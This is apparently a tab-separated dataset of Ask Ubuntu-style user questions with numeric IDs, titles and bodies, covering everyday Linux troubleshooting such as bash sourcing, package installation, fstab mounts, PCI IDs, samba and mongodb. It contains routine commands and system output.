182012	is there a difference between `` . '' and `` source '' in bash , after all ?	i was looking for the difference between the `` . '' and `` source '' builtin commands and a few sources ( e.g. , in this discussion , and the bash manpage ) suggest that these are just the same . however , following a problem with environment variables , i conducted a test . i created a file testenv.sh that contains : # ! /bin/bash echo $ my_var in the command prompt , i performed the following : > chmod +x testenv.sh > my_var=12345 > ./testenv.sh > source testenv.sh 12345 > my_var=12345 ./testenv.sh 12345 [ note that the 1st form returned an empty string ] so , this little experiment suggests that there is a difference after all , where for the `` source '' command , the child environment inherits all the variables from the parent one , where for the `` . '' it does not . am i missing something , or is this is an undocumented/deprecated feature of bash ? [ gnu bash , version 4.1.5 ( 1 ) -release ( x86_64-pc-linux-gnu ) ]
182022	how to listen to radio flash , a media player ?	i would like to hear radio from streaming flash , eg http : //www.los40principales.com.ar/player/player.htm . i can hear it from firefox , but i wonder if it is possible to listen to the radio in audacious through a plugin or something . greetings and thanks in advance i have audacious 3.3.1 ubuntu 12.04 64 bits
182023	nginx with ssl package	i 'm trying to install nginx using the package manager . usually i 'd do this : sudo apt-get install nginx but i need nginx to have ssl support . i could compile nginx from source with ssl support , but i 'd like to use a package manager just to make it easier to upgrade or remove if i need to . does the nginx package compile with ssl support or is there a way to make it ? thanks .
182027	how to use gcc 4.7 in place of 4.6 ?	so i 'm working on a project and i wanted to use some c11 features for c. to use those features gcc 4.7 is required , so i went to synaptic and looked up 4.7 , and i found the packages gcc-4.7-base so i installed it [ 1 ] . so now that gcc-4.7-base is installed i expected to be able to use 4.7 , but no , when i do gcc -- version it still shows 4.6.3 even more , when i try to directly call 4.7 ( via /usr/bin/gcc-4.7 ) it does n't exist , though a gcc-4.6 executable does exist . how do i `` activate '' gcc 4.7 ? i read here , you do some crazy stuff with update-alternatives , but it does n't work for me as the gcc-4.7 executable does n't actually exist on my machine . notes : 1 . i also saw gcc-4.6-base , so i figured i 'd uninstall it , but synaptic attempted to remove every package i had installed and install a java runtime , so for obvious reason i decided not to remove it .
182030	how can i find out which package is triggering the installation of i386 libraries when using ubuntu 64bit ?	i 'm running precise 64bit . one of the packages i 've installed recently needed 32bit packages which triggered the installation of a whole bunch of i386 dependencies . how can i look up which package that is ? update : how can i identify and remove all packages which are not 64bit ?
182032	edubuntu and firefox add ons help	i have installed edubuntu 12.04 and have ltsp working . this is installed in a classroom setting and i would like to use a content filter in firefox as an add on . the add on i would like to use is procon . the problem that i am having is that i would like to install this add on globally to firefox and not have to install it on every user account . can you help me ?
182034	how to make several drives one large hard drive ?	just wondering how i would go about make say three 1tb drives one large volume ? this way i do n't need to section things off to different hard drives , and ubuntu/linux can just assign the data where it sees fit . is this possible ?
182037	usb modem could not mount on 12.04	i have a usb wimax modem . if i connect it at ubuntu 10.04 it has been detected and mounted as cd see here . from there i got that it is `` iso96660 '' type and device location is /dev/sr1 . but when i connect this usb modem in ubuntu 12.04 , it could not be mounted . so i have tried to find the file sr1 in this location /dev/ and could not found any-thing . but if disconnect and then re-connect the usb modem at this path /dev/ , i saw a flickering of `` sr1 '' named file for a certain time ( 1 sec ) then it 's dis-appear . can anyone guide me to connect it step-by-step in ubuntu 12.04 ?
182038	keyboard not responding at login on toshiba satellite l775	just created a separate partition to load ubuntu 12.04 as a dual boot on a toshiba satellite l775 . os installed perfectly and is running flawlessly . the keyboard is not responding at login screen randomly . the virtual keyboard works and the mouse works but the keyboard is unresponsive . after rebooting a couple of times it is responsive again and works with no issues . went in to keyboard shortcuts and disabled a few of the superfluous media short cut keys in the off chance that it is hinging on a rogue key command that this series of laptop uses . is there a command line that will debug this issue ? thanks
182048	will it be possible to use a non-pae kernel in recent versions of ubuntu ?	i know that ubuntu +1 questions are frowned upon , but this i believe is a fair exception . currently i have 2 systems running ubuntu 12.10 , and one of them has a pentium m that does n't support pae ( strange i know , but true ) . this has meant in the past that i had to rely on a custom iso to install ubuntu a similar system , and so this time i went with xubuntu 12.04 . my question is 2 fold , but really one question : is it/will it be possible to install a non-pae version of the 12.10 kernel from the standard repositories ? if no , how can i get such a kernel ? ( is there a ppa with such a kernel available ? ) . nb : before anyone suggests that i just install this package : http : //packages.ubuntu.com/quantal/linux-image-generic , please note that this comes with pae enabled . p.s . yes , i have googled . i have n't found the answer .
182061	uninstalling a windows program using ubuntu	i have a dual boot pc and i accidentally installed a program which has made my bootmgr of windows 7 corrupt . i have access to ubuntu though . is there any way that i can uninstall that program from windows 7 using ubuntu ?
182071	upgrade to 12.04 results to empty dash , no date & time either on the top panel	i 've upgraded from ubuntu netbook remix something to 12.04 lts , and i 've got two issues . ( got an asus eeepc 32bits , intel 945gme x86/mmx/sse2 and intel atom cpu n270 @ 1.6ghz x2 ) nothing in the dash . only the `` home '' tab , other tabs are missing . no search results whatsoever . missing elements in the system panel , privacy and date & time . no date & time on the right corner either . i 've tried to reset unity with the terminal but the process was a whole mess full of errors . it did show date & time in the system panel ( not on the top-right corner ) while the process was going on in the terminal . but then it was such a mess ( no more icons on the right corner amongst other things ) , and the process would n't complete , so i had to reboot the computer and get unity as before , still no date & time and privacy .
182073	what is the equivalent of window 's autorun , startup folder , for xfce , unity ?	i need to start some programs after the desktop environment loads itself , what would be the equivalent of window 's autorun or startup folder ?
182074	no panels at all after upgrading from 10.04 to 12.04	after upgrading to 12.4 from 10.4 on an amd64 the situation is as follows : after booting i see the xubuntu logo splash screen and when i log in i get an error that there is a system crash somewhere ( it suggest to click on the notification icon , but no info appears then ) . finally i can only see my initial 10.04 desktop but i have no panels at all , so i can only click on my desktop objects . will a clean re-install solve the problem ? in such case will my multi partition configuration ( vista+xp+ubuntu ) be affected ?
182078	transparent home directory encryption	# 1 i 'm very new to the ubuntu home directory encryption or rather ecryptfs folder encryption . i read about the same within dustin 's blog & tried implementing it . problem or query is my home directory is encrypted & has a www folder ... now when i reboot the system the decryption doesnt happen at startup/boot & apache is not able to find the files rather the folder www since it is not mounted ... in order to mount it i have to login ... . is there a way by which an encrypted home / private folder can be mounted at boot without human intervention ? # 2 i have installed ubuntu server 11.10 & had selected `` encrypt home directory '' when installing the same . with ubuntu things are working transparently even after reboot & without logging in . kindly can anyone pls explain or guide on the same ?
182079	which type of flash for ubuntu 12.04 in firefox	when i visit the flash page to download it for the first time on ubuntu 12.04 it 's got a dropdown box asking whether i want to install 'yum for linux ' , or 'tar.gz for other linux ' or '.rpm for other linux ' . i would like someone to tell me which it should be ( in any ) and possibly , why . thanks in advance
182082	picasa packages for ubuntu are no longer available	while trying to install picasa for ubuntu , the following errors occurred : wget http : //dl.google.com/linux/deb/pool/non-free/p/picasa/picasa_3.0-current_amd64.deb & & sudo dpkg -i picasa_3.0-current_amd64.deb -- 2012-08-30 17:41:36 -- http : //dl.google.com/linux/deb/pool/non-free/p/picasa/picasa_3.0-current_amd64.deb resolving dl.google.com ( dl.google.com ) ... 74.125.237.128 , 74.125.237.142 , 74.125.237.136 , ... connecting to dl.google.com ( dl.google.com ) |74.125.237.128|:80 ... connected . http request sent , awaiting response ... 404 not found 2012-08-30 17:41:36 error 404 : not found .
182087	how to restore downloads folder from de ja dup backup	i backed up my entire home folder including downloads . after purchasing a new laptop , i found there is no `` revert to previous version '' when right clicking on downloads . there are files in downloads that i want . how to access them from my external in de ja dup backup ?
182089	clearing firefox 's cache	i have ubuntu installed on my mac with virutalbox . firefox is installed and i want to clear the cache of firefox . i do n't find any menu bar , how can i do that ?
182093	12.04 install freeze , blank cursor page	i have been trying to install ubuntu 12.04 via a live cd and most recently with the windows installer i found on line . the windows installer seemed to be working ; i selected the partitioned portion of the drive on which to install ubuntu and started the install process . the process freezes on a page with a flashing cursor and nothing else displayed . i have read about similar problems but have not been able to implement any of the solutions people have discussed . any ideas on what might be hanging up the process , or how to get a better idea of what is causing the problem would be helpful . if anyone has had this problem and has a solution it would be greatly appreciated !
182095	can i use a kernel package from another distro ?	i 'm running lubuntu 12.04 on an original eeepc . in arch linux there 's a repository which provides a highly customized very light-weight kernel specifically tailored for that particular machine 's hardware . is there anything which would prevent me from using that kernel with lubuntu ? i understand that i 'll have to download it manually and configure grub myself .
182115	internet connections ubuntu 12.04 server with unity gui	i am very new to all this and thought i 'd have a look at ubuntu with the hope of it running my server . i have installed ubuntu 12.04 server which went fine , i then installed unity again this was all fine . i can access the gui fine but my one problem is internet connection . it works fine , i can access the internet and everything but i ca n't view system setting > network as it says 'the system network service are not compatible with this version' i also ca n't see any network connections or if i click on edit connections it opens fine but i ca n't actually edit or add anything as it is all shaded out . i was trying to assign my server a static ip address does anyone have any idea what 's up with this . like it said the internet works fine . any solutions or advice for this complete newbie would be much appreciated . many thanks luke
182122	how do i paste text using the mindterm java ssh client on an amazon ec2 ubuntu server ?	i am using windows and is connecting to an ubuntu server i want to add this line to a text file /dev/xvdf /mnt1 auto defaults , nobootwait 0 0 obviously i prefer to copy and paste that rather than typing it so i do nano /etc/fstab in amazon ec2 then what ? i ca n't paste anything . how do i paste lines like that to nano or any other linux text editor ?
182123	ubuntu 12.04 - copying large files over nfs and samba causes server to drop off the network	i have a 64bit 12.04 server with a raid 6 array . i have setup nfs and samba shares . if i copy any files over nfs from client to server - the speed of the copy is ridiculously low - around 1-2mb/s if i copy to the same folder being shared over samba - i get 45-50mb/s however , if i copy a group of folders that exceed 10gb over either connection the server will just drop of the network and i can not access it via ssh or any other means . i am unable to use : sudo ifconfig eth0 up/down to reset the nic interface - the only option is to power down and restart the server . if anyone can point me to any logs to check for what is causing the error or help to diagnose i would be much appreciated as this makes my server pretty much useless . cheers ice .
182124	installing starlink - what does this step mean ?	i 've just installed ubuntu so that i can install the starlink astronomical data analysis tools , and i 'm stuck on one of the installation steps : '' 7.if not yet available , install the following packages ( which are required by some of the starlink software ) : 1. csh `` how do i check is `` csh '' is 'available ' ? if it is n't , where do i get the package `` csh '' ? and when i have downloaded it , where should i put it ? in /star-namaka/lib/ or somewhere else ?
182127	all files on automounted ntfs partition are marked as executable	i have set up an ntfs partition to automount via fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda7 during installation uuid=e63fa8a2-432f-4749-b9db-dab328807d04 / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda4 during installation uuid=e9ad1bb4-7c1f-4ea9-a6a5-799dfad71c0a /boot ext4 defaults 0 2 # /home was on /dev/sda8 during installation uuid=eda8c755-5448-4de8-b58c-9cb75823c22d /home ext4 defaults 0 2 # swap was on /dev/sda9 during installation uuid=804ff3a7-e5dd-406a-b63c-e8f3c635fbc5 none swap sw 0 0 # windows-partition uuid=368cebc57807fdcd /media/share ntfs defaults , uid=1000 , gid=1000 , noexec 0 0 as you can see i have added the noexec bit to the configuration . why ? because any file i create on or move to the partition is automatically marked as executable . the problem is that there is no way of changing that through nautilus . i can not uncheck the `` allow executing file as program '' option . the noexec option does n't help , unfortunately . it only prevents nautilus from displaying the `` run '' or `` read '' dialog but does n't change the executable flag . is there any way i can fix this ?
182128	how can i hide winmail.dat in evolution ?	i have a problem with the evolution e-mail program . since a while i get from certain people mails with the attachment winmail.dat . i have installed the evolution-experimental-plugins package for the tnef plugin but with no succes . ( the winmail.dat attachment still shows up . ) i also have asked if those who send me one of those mail if they could change it in the settings but they refused . can someone help me ?
182131	samba does not accept my password	i have installed samba onto ubuntu 12.04 server but i ca n't login as it says my password is incorrect but i am the only user so there are no other passwords . i have tried changing the password through the terminal but nothing is working . any advice for a newbie is very much appreciated .
182137	how do i know which processes are running and who own the process ?	i want to change the mongodb database directory . some says that i need to change the owner of the new directory to the username that is running mongodb http : //stackoverflow.com/questions/5798549/why-cant-i-start-the-mongodb how do i know which user is running the mongodb service ? well i suppose i just look at all the processes and see who own those processes . how do i see the running processes . i run the answer and get this . looks like the user is mongodb . not ubuntu , not root , but mongodb root @ ip-10-138-30-205 : /media/newdrive # ps aux | grep mongodb mongodb 17140 0.3 5.2 131484 31832 ? ssl 11:35 0:00 /usr/bin/mongod -- config /etc/mongodb.conf root 17154 0.0 0.1 8096 936 pts/0 s+ 11:38 0:00 grep -- color=auto mongodb
182144	what is the default data directory for mongodb if we install that in amazon ec2	i tried to find this info everywhere and could n't find it . i already change mongodb.conf so i forget where the original directory is .
182149	what happen to my ubuntu if my graphic not support unity 3d when upgrade to 12.10	unity 2d , the light-weight counterpart to ubuntu’s unity interface , has been retired from ubuntu 12.10 . the 2d version of unity has been used as a fallback for users whose computers lack sufficient graphical grunt to run the ’3d’ version . so what happen if i upgrade to 12.10 ?
182154	which table of pci codes shall i use ?	i have downloaded from http : //pciids.sourceforge.net/v2.2/pci.ids the last pci.id file and i updated my /usr/share/misc/pci.ids file with it . old pci.ids file , march 2010 : lspci -nn outputs : 00:00.0 host bridge [ 0600 ] : intel corporation 2nd generation core processor family dram controller [ 8086:0100 ] ( rev 09 ) 00:01.0 pci bridge [ 0604 ] : intel corporation sandy bridge pci express root port [ 8086:0101 ] ( rev 09 ) 00:16.0 communication controller [ 0780 ] : intel corporation cougar point heci controller # 1 [ 8086:1c3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation cougar point usb enhanced host controller # 2 [ 8086:1c2d ] ( rev 05 ) 00:1b.0 audio device [ 0403 ] : intel corporation cougar point high definition audio controller [ 8086:1c20 ] ( rev 05 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation cougar point pci express root port 1 [ 8086:1c10 ] ( rev b5 ) 00:1c.5 pci bridge [ 0604 ] : intel corporation cougar point pci express root port 6 [ 8086:1c1a ] ( rev b5 ) 00:1c.6 pci bridge [ 0604 ] : intel corporation cougar point pci express root port 7 [ 8086:1c1c ] ( rev b5 ) 00:1c.7 pci bridge [ 0604 ] : intel corporation 82801 pci bridge [ 8086:244e ] ( rev b5 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation cougar point usb enhanced host controller # 1 [ 8086:1c26 ] ( rev 05 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation z68 express chipset family lpc controller [ 8086:1c44 ] ( rev 05 ) 00:1f.2 sata controller [ 0106 ] : intel corporation cougar point 6 port sata ahci controller [ 8086:1c02 ] ( rev 05 ) 00:1f.3 smbus [ 0c05 ] : intel corporation cougar point smbus controller [ 8086:1c22 ] ( rev 05 ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gf116 [ geforce gtx 550 ti ] [ 10de:1244 ] ( rev a1 ) 01:00.1 audio device [ 0403 ] : nvidia corporation gf116 high definition audio controller [ 10de:0bee ] ( rev a1 ) 03:00.0 usb controller [ 0c03 ] : asmedia technology inc. asm1042 superspeed usb host controller [ 1b21:1042 ] 04:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) 05:00.0 pci bridge [ 0604 ] : asmedia technology inc. asm1083/1085 pcie to pci bridge [ 1b21:1080 ] ( rev 01 ) new pci.ids file , version : 2012.08.15 : lspci -nn outputs : 00:00.0 host bridge [ 0600 ] : intel corporation 2nd generation core processor family dram controller [ 8086:0100 ] ( rev 09 ) 00:01.0 pci bridge [ 0604 ] : intel corporation xeon e3-1200/2nd generation core processor family pci express root port [ 8086:0101 ] ( rev 09 ) 00:16.0 communication controller [ 0780 ] : intel corporation 6 series/c200 series chipset family mei controller # 1 [ 8086:1c3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 [ 8086:1c2d ] ( rev 05 ) 00:1b.0 audio device [ 0403 ] : intel corporation 6 series/c200 series chipset family high definition audio controller [ 8086:1c20 ] ( rev 05 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 1 [ 8086:1c10 ] ( rev b5 ) 00:1c.5 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 6 [ 8086:1c1a ] ( rev b5 ) 00:1c.6 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 7 [ 8086:1c1c ] ( rev b5 ) 00:1c.7 pci bridge [ 0604 ] : intel corporation 82801 pci bridge [ 8086:244e ] ( rev b5 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 [ 8086:1c26 ] ( rev 05 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation z68 express chipset family lpc controller [ 8086:1c44 ] ( rev 05 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 6 series/c200 series chipset family sata ahci controller [ 8086:1c02 ] ( rev 05 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 6 series/c200 series chipset family smbus controller [ 8086:1c22 ] ( rev 05 ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gf116 [ geforce gtx 550 ti ] [ 10de:1244 ] ( rev a1 ) 01:00.1 audio device [ 0403 ] : nvidia corporation gf116 high definition audio controller [ 10de:0bee ] ( rev a1 ) 03:00.0 usb controller [ 0c03 ] : asmedia technology inc. asm1042 superspeed usb host controller [ 1b21:1042 ] 04:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) 05:00.0 pci bridge [ 0604 ] : asmedia technology inc. asm1083/1085 pcie to pci bridge [ 1b21:1080 ] ( rev 01 ) i would like to know if i can normally use the new pci.ids file . edit : the same output from a non updated ubuntu 10.04 system 00:00.0 host bridge [ 0600 ] : intel corporation device [ 8086:0100 ] ( rev 09 ) 00:01.0 pci bridge [ 0604 ] : intel corporation sandy bridge pci express root port [ 8086:0101 ] ( rev 09 ) 00:16.0 communication controller [ 0780 ] : intel corporation cougar point heci controller # 1 [ 8086:1c3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation cougar point usb enhanced host controller # 2 [ 8086:1c2d ] ( rev 05 ) 00:1b.0 audio device [ 0403 ] : intel corporation cougar point high definition audio controller [ 8086:1c20 ] ( rev 05 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation cougar point pci express root port 1 [ 8086:1c10 ] ( rev b5 ) 00:1c.5 pci bridge [ 0604 ] : intel corporation cougar point pci express root port 6 [ 8086:1c1a ] ( rev b5 ) 00:1c.6 pci bridge [ 0604 ] : intel corporation cougar point pci express root port 7 [ 8086:1c1c ] ( rev b5 ) 00:1c.7 pci bridge [ 0604 ] : intel corporation 82801 pci bridge [ 8086:244e ] ( rev b5 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation cougar point usb enhanced host controller # 1 [ 8086:1c26 ] ( rev 05 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation device [ 8086:1c44 ] ( rev 05 ) 00:1f.2 sata controller [ 0106 ] : intel corporation cougar point 6 port sata ahci controller [ 8086:1c02 ] ( rev 05 ) 00:1f.3 smbus [ 0c05 ] : intel corporation cougar point smbus controller [ 8086:1c22 ] ( rev 05 ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation device [ 10de:1244 ] ( rev a1 ) 01:00.1 audio device [ 0403 ] : nvidia corporation device [ 10de:0bee ] ( rev a1 ) 03:00.0 usb controller [ 0c03 ] : device [ 1b21:1042 ] 04:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) 05:00.0 pci bridge [ 0604 ] : device [ 1b21:1080 ] ( rev 01 )
182157	is there any way to use windows live messenger in ubuntu ?	i know there are many alternatives to windows live messenger like empathy , pidgin , emesene or amsn . however , i usually use the 'photo sharing ' feature with my friends that is not in any chat client . i need to use my msn messenger account . so how to use windows live messenger in ubuntu ? or can i connect to wlm and use 'photo sharing ' with any chat client for linux ? would you recommend to use a virtual machine ?
182160	how can i remove compiz ?	i 'd like some help to fix another unity issue . after last update , my system broke . for example , when i execute a 'ls ' command , the screen breaks and does not show anything . sometimes , just the beggining is shown . how can i fix it ? i do n't want use another x , for now ... thanks
182164	lots of static/crackling noises after alsa hda dkms installation	i am using a samsung chronos 7 laptop with the following sound setup : $ head -n 1 /proc/asound/card0/codec* == > /proc/asound/card0/codec # 0 < == codec : realtek alc269vc == > /proc/asound/card0/codec # 3 < == codec : intel cougarpoint hdmi with the stock alsa that comes with ubuntu 12.04 , i do not get any sound out of the headphones when i plug them into the headphone jack . after plugging the headphones in , i have to manually use alsamixer to increase the volume , so that the headphones become usable . i have been told that this issue is due to my sound chip not being supported in the alsa version that ships with precise . a similar question at askubuntu and the ubuntu community documentation point me to the alsa dkms installation . after installing the dkms module of yesterday 's alsa snapshot and rebooting , the headphone issue is indeed solved . i can now plug my headphones into the jack and instantly have sound on them . however , now i have tons of static noises and crackling when playing sound in vlc player or skype ( firefox html5 playback seems to be fine , unless a skype sound interferes with it ) . is there a fix for this ? i tried adding the alsa ppa and installing the latest alsa package proper , but that did n't have any effect , only the alsa dkms package seems to solve the headphone issue .
182170	ideal space for partition to install ubuntu	i have a 60gb toshiba satellite laptop with xp pro with one partition ( 27 gb are used by xp and 28gb are free ) . i am going to create a partition ( with gparted from ubuntu 12.04 boot cd ) and after that i 'll install 12.04 from the same cd . how much space is ideal for this partition ?
182179	i ca n't install ubuntu on my dell inspiron 15r at all	i 'm attempting to install ubuntu 12.04lts , 64bit onto a dell inspiron 15r laptop . i 've shrunk down one of the windows partitions and even used gparted to format the vacant space as ext4 . however , the install disk simply does not present any options when it comes to the partitioning step . what i get is a non-responsive blank table . as well as the above , i 've changed the bios settings so that usb emulation is disabled ( as per ca n't install on dell inspiron 15r ) , and changed the sata operation setting to all three possible options . anyway , the install cd will bring up the trial version of ubuntu , and if i open terminal and type sudo fdisk -l , i get this : disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xb4fd9215 device boot start end blocks id system /dev/sda1 63 80324 40131 de dell utility partition 1 does not start on physical sector boundary . /dev/sda2 * 81920 29044735 14481408 7 hpfs/ntfs/exfat /dev/sda3 29044736 1005142015 488048640 7 hpfs/ntfs/exfat /dev/sda4 1005154920 1953520064 474182572+ 83 linux disk /dev/sdb : 32.0 gb , 32017047552 bytes 255 heads , 63 sectors/track , 3892 cylinders , total 62533296 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xb4fd923d device boot start end blocks id system /dev/sdb1 2048 16775167 8386560 84 os/2 hidden c : drive if i type sudo parted -l , i get : model : ata wdc wd10jpvt-75a ( scsi ) disk /dev/sda : 1000gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 1 32.3kb 41.1mb 41.1mb primary fat16 diag 2 41.9mb 14.9gb 14.8gb primary ntfs boot 3 14.9gb 515gb 500gb primary ntfs 4 515gb 1000gb 486gb primary ext4 model : ata samsung ssd pm83 ( scsi ) disk /dev/sdb : 32.0gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 8589mb 8588mb primary warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : ca n't have a partition outside the disk ! i 've also tried a kubuntu 12.04 and linux mint install disks , with the same problem . i 'm completely lost here .
182183	wammu , samsung j700 error getnextmemory code : 56	i have got a ( old ) samsung j700i . when connecting with a usb cabel to wammu first the access was denied . now it is okăš ... however , when i try to get info out from the phone ... i get error message : error whlie communicating with phone desciption : internal phone error . function : getnextmemory error code : 56 i am using ubuntu 12.04 and wammu 0.36 running on python 2.7.3 using wxpython 2.8.12.1 using python-gammu 1.31.0 and gammu 1.31.0 how may i access data on the phone ? thanks , tamas
182187	terminal and software center disappear in ubuntu 10.10	i am using ubuntu 10.10 . while i was working , terminal was disappeared and after some time software center also disappeared . also , i am not able to reboot my system now . the error looks like : could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_maverick_universe_binary-i386_packages , e : the package lists or status file could not be parsed or opened . '
182188	how to save gnome terminal contents with ansi escape codes ?	vt100 terminals have a relatively simple way to save terminal contents with escape codes to a file using meta-p : xterm.vt100.printattributes : 2 xterm.vt100.printercommand : cat - > file xterm.vt100.translations : # override meta < keypress > p : print ( ) \n i 've looked around quite a bit , and ca n't find a solution for this to work in the default gnome terminal + xterm + bash . i do not want just an image with the contents of the window . it looks like gnome terminal might eventually get a fix for this , but there 's no information about which version it will be included in , and it 's been almost three years since the last update ...
182198	dpkg -r giving warnings while removing package	i have a custom binary package . i am creating the package from a makefile . here is the code for the same : firefox_dir = /usr/share/mozilla/extensions/ { ec8030f7-c20a-464f-9b0e-13a3a9e97384 } build : mkdir -p $ ( app_source_dir ) mkdir -p $ ( app_source_dir ) /opt/sapience/config mkdir -p $ ( app_source_dir ) /opt/sapience/firefox mkdir -p $ ( app_source_dir ) / $ ( firefox_dir ) /firefox-extension @ sapience mkdir -p $ ( app_source_dir ) /usr/bin mkdir -p $ ( app_source_dir ) /debian cp $ ( rt ) /../bin/sapiencecollector $ ( app_source_dir ) /usr/bin/ . cp $ ( rt ) /../debian/control $ ( app_source_dir ) /debian/ . cp $ ( rt ) /../debian/postinst $ ( app_source_dir ) /debian/ . cp $ ( rt ) /../debian/prerm $ ( app_source_dir ) /debian/ . cp $ ( rt ) /../config/conf.ini $ ( app_source_dir ) /opt/sapience/config/ . cp -r $ ( rt ) /../external/firefox-extension/* $ ( app_source_dir ) / $ ( firefox_dir ) /firefox-extension @ sapience/ . dpkg -- build $ ( app_source_dir ) $ ( app_name ) - $ ( version ) .deb i need to create a directory named sapience inside /opt as part of my installation . in order to do that i am creating the same directory hierarchy inside the package directory . /opt is already present in linux & i do not want to create it again on the machine i install the package . the package gets installed properly . when i try to remove the package using the command dpkg -r < pkgname > i get the following error : dpkg : warning : while removing , /opt directory is not empty so not removed . i do not want to remove the /opt directory but still dpkg is trying to remove it . could anyone let me know what changes i need to make to avoid dpkg to remove the directories .
182209	ssd becomes hot , disk failure warning	i have a two weeks old ssd ( kingston ssdnow 64gb ) . yesterday , the computer shutdown twice and after rebooting i was bombarded with disk failure warnings . i usually take such warnings serious ( and backed up ) , but skeptical . after cooling down , the laptop boots again and the only red smart value was the temperature ( ubuntu did not show the temperature of failure , but the at that time 29째 ) . after refreshing the smart status and doing a `` self test '' , everything is green . before contacting kingston support , i would like to know whether it could be due to a software issue : is it possible that it is false alarm , and how can i check ? i installed ubuntu 12.04 32bit and took care of alignment . i supposed ubuntu set up with optimal settings for ssds , how can i check that there was no mistake ? the current temperature is around 40-56째 . is such a temperature abnormal for ssds ? output of sudo smartctl -- all /dev/sda : http : //pastebin.ubuntu.com/1175940/
182214	how can i view ms-office 2007 built-in help on ubuntu 12 ?	i 'm running ms office on ubuntu 12 using wine 1.4 . everything is working fine , except the built-in help . i 'm unable to see anything in the help dialogues . how can i solve this issue ? im posting a screen-shot which i have taken while working on excel 2007 .
182216	reuse last line on terminal	when one issues a command that does not exist in the terminal , it results in : the program 'programname ' is not installed . you can install it by typing : sudo apt-get install programname is there any shortcut by which one does not have to retype the 'sudo apt-get install programname ' line ?
182223	lowering gpu temperature on radeon 6850 with open source driver	i read and tried this and it does n't work for me ! when i type echo `` mid '' > /sys/class/drm/card0/device/power_profile i see what this value really changed ( needs the chmod was applied before , that is missed in the text ) , when i type 'cat /sys/class/drm/card0/device/power_profile ' . but when i check again cat /sys/kernel/debug/dri/0/radeon_pm_info i see no changes ! frequencies are still at max . and yes , /sys/class/drm/card0/device/power_method is set to 'profile ' ( not 'dynpm ' ) . how can i change frequencies ? ! ubuntu 12.04 , radeon 6850 .
182224	is file permission secured when it transferred from ubuntu to windows ?	i am having 9gb text file which is encrypted . this file contains some confidential data . which is on my system ( ubuntu ) and my external hdd ( ntfs ) . this file get daily updated and then encrypted . but it has to be shared among 2-3 ( windows ) person . i defined permission so that no other person can even read this file ( chmod 660 ) . it is too large file , so i ca n't upload it anywhere and it get updated daily basis . but this file travel on windows os and ubuntu also . even i am having copy of this on my personal computer . recently it was deleted by some other user over windows . i just want to know how can i set permission over that file so that it can not be deleted from any other operating system . if someone delete this file , then i am having data old for couple of days , which is only on my system . i gone through this question it says there is nothing . and from this question i am not able to understand how can i protect it . can i do anything for preventing this file from being deleted . then how can i secure this files from getting deleted any suggestion or software or ideas . maybe i sound silly or this is stupid question . please do n't close it , thanks for any suggestion or solution .
182227	how do i install and configure ubuntu one on ubuntu server 12.04 lts	i would like to use ubuntu one to backup individual files on ubuntu server 12.04 lts . how do i install and configure ubuntu one on ubuntu server 12.04 lts so that those individual files are backed up to the cloud every time they are updated ? dropbox is an option but i would like to give ubuntu one a try since it appears to be evolving nicely . thanks in advance for your guidance .
182229	looking for a clock widget that is unaffected by the mouse	between screenlets , cairo-dock widgets and plasma-widgets . one of them 's got ta have this function ; a widget that hovers above everything on the desktop but is completely unaffected by the mouse . i would use this by making a clock hover above everything and semi transparent . i also want to be able to click on windows underneath the clock . after some experimentation , the screenlets widgets do not do what i am asking . i can make them float above everything on the screen but i am not able to click on windows underneath them . i need the widget to be completely unaffected by the mouse .
